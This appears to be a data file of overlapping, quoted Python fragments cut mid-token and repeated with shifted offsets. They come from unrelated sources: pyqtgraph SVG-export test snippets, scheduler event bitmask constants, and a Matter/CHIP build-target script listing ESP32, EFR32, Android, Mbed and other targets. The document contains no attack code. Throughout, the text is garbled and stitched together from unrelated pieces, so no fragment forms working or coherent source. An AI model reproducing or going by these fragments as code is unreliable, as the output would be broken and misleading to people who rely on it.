#rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 =", "#rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0,", "rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ ==", "#rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2)", "#def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 =", "100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0,", "100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 =", "##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25)", "= pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3)", "cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ == '__main__':", "= w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k',", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5,", "#rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100)", "0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5)", "= pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect)", "pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex", "'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self):", "##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0,", "test \"\"\" import test import pyqtgraph as pg app =", "#rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex" ]
[ "2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED =", "EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2 ** 10", "EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2 ** 14", "EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4", "** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2", "3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 **", "** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2", "2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED =", "(EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED |", "2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED =", "| EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED", "| EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED", "9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2 **", "EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5", "2 ** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED =", "= 2 ** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED", "| EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR", "= 2 ** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED", "2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2 **", "= 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL", "** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2", "EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2 ** 9", "** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED |", "** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2", "EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2", "EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8", "2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED =", "1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 **", "= 2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED", "** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2", "EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN", "= 2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR", "15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED |", "EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR |", "16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED", "EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED |", "12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2 **", "2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR =", "** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2", "EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED |", "2 ** 8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED =", "EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1", "EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED |", "= 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED", "= 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN |", "** 12 EVENT_JOB_ERROR = 2 ** 13 EVENT_JOB_MISSED = 2", "EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED |", "11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2 **", "EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED |", "| EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED", "= EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 **", "** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2", "= 2 ** 3 EVENT_EXECUTOR_ADDED = 2 ** 4 EVENT_EXECUTOR_REMOVED", "10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2 **", "EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16", "EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED |", "EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED = 2 ** 12", "EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2 ** 6", "= 2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES", "** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED", "** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2", "2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES =", "2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED =", "= 2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED", "** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2", "| EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED", "<gh_stars>10-100 EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN =", "0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 **", "14 EVENT_JOB_SUBMITTED = 2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 **", "| EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED", "** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED = 2", "= 2 ** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED", "** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2", "EVENT_SCHEDULER_STARTED = EVENT_SCHEDULER_START = 2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2", "2 ** 9 EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED =", "** 8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2", "EVENT_JOB_REMOVED = 2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11", "2 ** 10 EVENT_JOB_MODIFIED = 2 ** 11 EVENT_JOB_EXECUTED =", "2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED =", "EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED |", "2 ** 16 EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED", "| EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED", "= 2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED", "** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2", "2 ** 15 EVENT_JOB_MAX_INSTANCES = 2 ** 16 EVENT_ALL =", "= 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3 EVENT_EXECUTOR_ADDED", "2 ** 1 EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED =", "= 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED", "2 ** 0 EVENT_SCHEDULER_SHUTDOWN = 2 ** 1 EVENT_SCHEDULER_PAUSED =", "| EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED | EVENT_JOB_MAX_INSTANCES)", "2 ** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED =", "EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED |", "= 2 ** 8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED", "4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2 **", "= (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED", "** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2", "EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15", "13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2 **", "EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED |", "| EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED", "| EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED", "= 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED", "| EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED", "EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED |", "EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED |", "5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 **", "EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2 ** 13", "EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7", "8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2 **", "| EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED", "EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3", "= 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED", "6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 **", "7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2 **" ]
[ "profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def", "2.0 (the \"License\"); # you may not use this file", "(a.name in b.conflicts) or (b.name in a.conflicts): return True return", "from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board,", "yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool',", "new build variant \"\"\" clone = self.Clone() clone.name += \"-\"", "str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner,", "variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target", "'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT))", "QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen", "app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL))", "user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only", "Check that item.requires is satisfied for all items in the", "# note the clone in case the default arg is", "args not forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc", "and '-no-interactive' not in target.name: # Interactive builds will not", "given list \"\"\" available = set([item.name for item in items])", "yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target =", "= variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def HostTargets():", "and what arguments are required to produce the specified build)", "conflicts: List[str] = [], requires: List[str] = [], **buildargs): self.name", "InfineonBuilder from builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp,", "Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield", "variant_count in range(1, len(ok_variants) + 1): for subgroup in combinations(ok_variants,", "and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive'", "extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if ('-rpc-console' in", "is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False)", "target.name): # Single-variant builds yield target else: builder.targets.append(target) for target", "app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants.", "HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] # x64", "yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def", "yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder)", "extending its build parameters. Arguments: suffix: appended with a \"-\"", "TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import", "builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True),", "License for the specific language governing permissions and # limitations", "conflict resolution between build variants and globbing whitelist targets. \"\"\"", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc =", "def Clone(self): \"\"\"Creates a clone of self.\"\"\" clone = Target(self.name,", "board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS)", "Enable nrf52840dongle for all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters',", "exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\",", "target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile", "# Only a few are whitelisted for globs name =", "app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK))", "self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified", "requires def HasConflicts(items: List[BuildVariant]) -> bool: for a, b in", "target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default", "efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a',", "def __init__(self, substr: List[str]): self.substr = substr def Accept(self, name:", "created - no conflicts variant_target = target.Clone() for option in", "for target in app_targets: if ('-rpc-console' in target.name) or ('-python-bindings'", "user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only", "= self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return clone", "target.name and '-no-interactive' not in target.name: # Interactive builds will", "target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)", "the specified variant to be allowed for globbing. By default", "import AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder", "app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed',", "requirement not in available: return False return True class VariantBuilder:", "builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\",", "\"\"\" Check that item.requires is satisfied for all items in", "board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)", "builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder,", "clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone", "possible variant for variant_count in range(1, len(ok_variants) + 1): for", "from typing import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder", "clone = self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return", "builds will not compile by default on arm cross compiles", "= name self.validator = validator self.conflicts = conflicts self.buildargs =", "ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light',", "target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd',", "whitelist targets. \"\"\" for target in self.targets: yield target #", "case the default arg is used self.targets = targets[:] self.variants", "if (a.name in b.conflicts) or (b.name in a.conflicts): return True", "return builder def GlobBlacklist(self, reason): clone = self.Clone() if clone.glob_blacklist_reason:", "compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target = Target('android',", "app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def", "Target ready to be created - no conflicts variant_target =", "OF ANY KIND, either express or implied. # See the", "board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets:", "See the License for the specific language governing permissions and", "enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list of", "substr: List[str]): self.substr = substr def Accept(self, name: str): for", "target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build variants. #", "all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield", "app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "to in writing, software # distributed under the License is", "release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield", "target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True)", "self.substr = substr def Accept(self, name: str): for s in", "continue # Target ready to be created - no conflicts", "or agreed to in writing, software # distributed under the", "cross compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() !=", "yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release',", "self.glob_blacklist_reason = None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a", "IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property def GlobBlacklistReason(self): return", "enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\",", "app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', 